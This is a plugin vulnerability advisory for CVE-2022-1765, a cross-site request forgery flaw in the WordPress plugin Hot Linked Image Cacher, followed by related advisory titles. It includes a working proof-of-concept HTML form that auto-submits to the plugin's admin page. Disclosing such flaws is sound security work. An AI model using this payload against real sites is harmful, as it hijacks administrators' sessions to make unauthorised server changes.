Hot Linked Image Cacher <= 1.16 – Image upload/cache abuse via CSRF | CVE 2022-1765 | Plugin Vulnerabilities

Description

The plugin is vulnerable to CSRF. This can be used to store / cache images from external domains on the server, which could lead to legal risks (due to copyright violations or licensing rules).

Proof of Concept

<form id="test" action="https://example.com/wp-admin/tools.php?page=hot-linked-image-cacher%2Fhotlinked-image-cacher.php" method="POST">
    <input type="text" name="domains[]" value="example.com">
    <input type="text" name="urlmethod" value="curl">
    <input type="text" name="postid" value="enter a post id here">
    <input type="text" name="step" value="3">
    <input type="text" name="Submit" value="Cache These Images »">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

hot-linked-image-cacher

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://daniel-ruf.de

Verified

Yes

WPVDB ID

b50e7622-c1dc-485b-a5f5-b010b40eef20

Timeline

Publicly Published

2022-05-17 (about 3 years ago)

Added

2022-05-17 (about 3 years ago)

Last Updated

2022-05-18 (about 3 years ago)

Other

Published

Title

Published

2025-12-11

Title

Simple Theme Changer <= 1.0 - Cross-Site Request Forgery to Arbitrary Theme Switcher Configuration Update

Published

2023-09-01

Title

authLdap < 2.5.9 - Settings Update via CSRF

Published

2025-01-03

Title

Notify Odoo < 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2023-09-29

Title

Timthumb Scanner <= 1.54 - Scan Initialisation via CSRF

Published

2024-06-28

Title

Blossom Shop < 1.1.8 - Cross-Site Request Forgery to Notice Dismissal